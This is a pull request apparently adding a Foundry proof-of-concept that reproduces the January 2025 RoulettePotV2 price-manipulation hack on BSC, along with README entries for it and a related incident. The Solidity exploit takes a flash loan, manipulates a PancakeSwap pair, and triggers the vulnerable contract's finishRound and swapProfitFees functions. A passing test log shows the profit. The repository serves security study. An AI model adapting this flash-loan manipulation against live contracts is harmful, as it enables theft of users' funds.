### PR TITLE
feat: add RoulettePotV2 attack incident

### DIFF
--- a/README.md
+++ b/README.md
@@ -48,6 +48,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20250111 RoulettePotV2](#20250111-roulettepotv2---price-manipulation)
 
 [20250108 LPMine](#20250108-LPMine---Incorrect-reward-calculation)
 
@@ -1182,6 +1183,25 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+
+
+
+
+### 20250111 RoulettePotV2 - Price Manipulation
+
+### Lost: ~28K
+
+
+```sh
+forge test --contracts ./src/test/2025-01/RoulettePotV2_exp.sol -vvv --evm-version shanghai
+```
+#### Contract
+[RoulettePotV2_exp.sol](src/test/2025-01/RoulettePotV2_exp.sol)
+### Link reference
+
+https://x.com/TenArmorAlert/status/1878008055717376068
+
+---
 
 ### 20250108 LPMine - Incorrect reward calculation 
 

--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-548 incidents included.
+550 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 
@@ -48,7 +48,10 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+
 [20250111 RoulettePotV2](#20250111-roulettepotv2---price-manipulation)
+
+[20250110 JPulsepot](#20250110-jpulsepot---logic-flaw)
 
 [20250108 LPMine](#20250108-LPMine---Incorrect-reward-calculation)
 
@@ -1184,9 +1187,6 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ### List of DeFi Hacks & POCs
 
-
-
-
 ### 20250111 RoulettePotV2 - Price Manipulation
 
 ### Lost: ~28K
@@ -1200,6 +1200,22 @@ forge test --contracts ./src/test/2025-01/RoulettePotV2_exp.sol -vvv --evm-versi
 ### Link reference
 
 https://x.com/TenArmorAlert/status/1878008055717376068
+
+---
+
+### 20250110 JPulsepot - Logic Flaw
+
+### Lost: 21.5K
+
+
+```sh
+forge test --contracts ./src/test/2025-01/JPulsepot_exp.sol -vvv --evm-version shanghai
+```
+#### Contract
+[JPulsepot_exp.sol](src/test/2025-01/JPulsepot_exp.sol)
+### Link reference
+
+https://x.com/CertiKAlert/status/1877662352834793639
 
 ---
 

--- a/src/test/2025-01/RoulettePotV2_exp.sol
+++ b/src/test/2025-01/RoulettePotV2_exp.sol
@@ -1,0 +1,71 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.15;
+
+import "../basetest.sol";
+
+// @KeyInfo - Total Lost : ~28K
+// Attacker : https://bscscan.com/address/0x0000000000004f3d8aaf9175fd824cb00ad4bf80
+// Attack Contract : https://bscscan.com/address/0x000000000000bb1b11e5ac8099e92e366b64c133
+// Vulnerable Contract : https://bscscan.com/address/0xf573748637e0576387289f1914627d716927f90f
+// Attack Tx : https://bscscan.com/tx/0xd9e0014a32d96cfc8b72864988a6e1664a9b6a2e90aeaa895fcd42da11cc3490
+
+// @Info
+// Vulnerable Contract Code : https://bscscan.com/address/0xf573748637e0576387289f1914627d716927f90f#code
+
+// @Analysis
+// Post-mortem : 
+// Twitter Guy : https://x.com/TenArmorAlert/status/1878008055717376068
+// Hacking God : 
+pragma solidity ^0.8.0;
+
+import "../interface.sol";
+
+interface IRoulettePotV2 {
+    function finishRound() external;
+    function swapProfitFees() external;
+}
+
+contract RoulettePotV2 is BaseTestWithBalanceLog {
+    uint256 blocknumToForkFrom = 45_668_285;
+    address internal constant PancakeV3Pool = 0x172fcD41E0913e95784454622d1c3724f546f849;
+    address internal constant PancakeSwap = 0x824eb9faDFb377394430d2744fa7C42916DE3eCe;
+    address internal constant RoulettePotV2 = 0xf573748637E0576387289f1914627d716927F90f;
+    address internal constant WBNB = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c;
+    address internal constant LINK = 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", blocknumToForkFrom);
+        //Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
+        fundingToken = address(WBNB);
+    }
+
+    function testExploit() public balanceLog {
+        address recipient = PancakeSwap;
+        uint256 amount0 = 0;
+        uint256 amount1 = 4_203_732_130_200_000_000_000;
+        bytes memory data = abi.encode(amount1);
+        IPancakeV3Pool(PancakeV3Pool).flash(recipient, amount0, amount1, data);
+    }
+
+    function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
+        uint256 amount = abi.decode(data, (uint256));
+
+        uint256 amount0Out = 0;
+        uint256 amount1Out = 17_527_795_283_271_427_200_665;
+        address to = address(this);
+        IUniswapV2Pair(PancakeSwap).swap(amount0Out, amount1Out, to, new bytes(0));
+
+        IRoulettePotV2(RoulettePotV2).finishRound();
+
+        IRoulettePotV2(RoulettePotV2).swapProfitFees();
+
+        uint256 balance = IERC20(LINK).balanceOf(address(this));
+        IERC20(LINK).transfer(PancakeSwap, balance);
+
+        amount0Out = 4_243_674_096_928_729_821_513;
+        amount1Out = 0;
+        IUniswapV2Pair(PancakeSwap).swap(amount0Out, amount1Out, to, new bytes(0));
+
+        IERC20(WBNB).transfer(PancakeV3Pool, amount+fee1);
+    }
+}


### PR DESCRIPTION
```bash
Ran 1 test for src/test/2025-01/RoulettePotV2_exp.sol:RoulettePotV2
[PASS] testExploit() (gas: 1229987)
Logs:
  Attacker WBNB Balance Before exploit: 0.000000000000000000
  Attacker WBNB Balance After exploit: 39.521593515709821513

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.71s (7.44ms CPU time)

Ran 2 test suites in 3.35s (3.13s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
```